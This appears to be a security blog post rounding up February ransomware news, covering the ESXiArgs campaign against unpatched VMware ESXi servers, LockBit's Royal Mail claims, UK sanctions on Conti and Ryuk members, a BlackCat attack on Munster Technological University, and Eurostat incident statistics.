“There are decades where nothing happens; and there are weeks where decades happen”
– Lenin
As unusual as it feels for me to post a bolshevik quote on my blog, I can’t think of a better phrase to sum up what a strange and busy month it has been (and we’re only half way there).
A lot has happened on the ransomware front so far in February, and I mean it, A LOT.
1. ESXiArgs ransomware
A two-year old vulnerability CVE-2021-21974 was exploited on unpatched VMware ESXi servers.
CVE Mitre described it as follows: “A malicious actor residing within the same network segment as ESXi who has access to port 427 may be able to trigger the heap-overflow issue in OpenSLP service resulting in remote code execution”.
Relying on unpatched software for OVER 2 YEARS when the relevant fix is easily available sounds incredible, yet these things happen all the time. To make this scenario even worse, several days well into this widely reported ransomware attack, Rapid 7 estimated close to 19,000 vulnerable servers that still remain vulnerable.
Luckily, a recovery guide for VMware ESXi has been published by security researchers Enes Sonmez & Ahmet Aykac from YoreGroup Tech Team. It can be accessed here.
Separately, CISA released their own recovery script on their GitHub page.
Currently there are over 2,000 online, compromised VMware servers out there, with nearly half of them located in Germany and France. Majority of those belong to OVH SAS.
Affected servers can be found using this Shodan query:
http.title:”how to restore your files”
… or try out Censys and their search (results vary slightly from Shodan).
2. LockBit and Royal Mail
The LockBit ransomware group officially claimed responsibility for the late January attack on Royal Mail and set the deadline for 9th February, threatening to release the UK’s postal service’s stolen data if the ransom demand was not met.
As of today, 14th February, LockBit claims to have “released all data”. However, no link to the alleged records was released and Royal Mail claimed that the attackers did not get their hands on any personal data belonging to their customers.
What LockBit did – true to their established MO – was to release the negotiations chat between them and Royal Mail / UK’s NCSC.
The chat offers a unique insight into the dynamics of how ransom payments are negotiated, and how in this case the ransomware group was confused between Royal Mail and Royal Mail International.
3. UK sanctions on ransomware actors
The UK government issued a sanctions notice (in coordination with their US counterparts) against seven Russian nationals who had “assets frozen and travel bans imposed”.
The individuals in question are linked to the Ryuk and Conti ransomware campaigns, which links them in some portion to the infamous May 2021 HSE attack.
See the BBC article on the matter here.
The official UK Gov press release states that:
- it is almost certain that the Conti group were primarily financially motivated and chose their targets based on the perceived value they could extort from them
- key group members highly likely maintain links to the Russian Intelligence Services from whom they have likely received tasking. The targeting of certain organisations, such as the International Olympic Committee, by the group almost certainly aligns with Russian state objectives
- it is highly likely that the group evolved from previous cyber organised crime groups and likely have extensive links to other cyber criminals, notably EvilCorp and those responsible for Ryuk ransomware
4. Ransomware attack on MTU in Ireland
Last week four campuses of Munster Technological University in Cork were turned into digital crime scenes by a ransomware attack attributed to the BlackCat threat actor group.
Disruption to lectures and full closure of the facilities were the results, but the university administration stated they would not be paying the ransom and would rely on restoring services using backups.
The timing of this attack can be coincidental, but similar attacks were reported around the same time across Europe and further afield, from Finland to Israel.
The indicators of compromise in the MTU attack have not been disclosed publicly, however there is an observable increasing trend of using trojanized Microsoft OneNote files to deliver malicious payloads disguised as links to legitimate documents.
I had the opportunity to offer some insights into profiling the BlackCat ransomware group here.
5. Eurostat - 22% of EU enterprises had ICT security incidents in 2021
A freshly released report from Eurostat for 2021 states that 22.2% of businesses with 10 or more employees experienced ICT security incidents and suffered destruction, corruption or disclosure of data.
Over 6% of those incidents were caused by ransomware, DDoS, intrusions or other malicious software, while ransomware type attacks specifically accounted for 3.5%.
Surprisingly (or not?), the most common causes of all ICT incidents were hardware or software failures.
So it seems those backups are indeed useful, for more than one reason.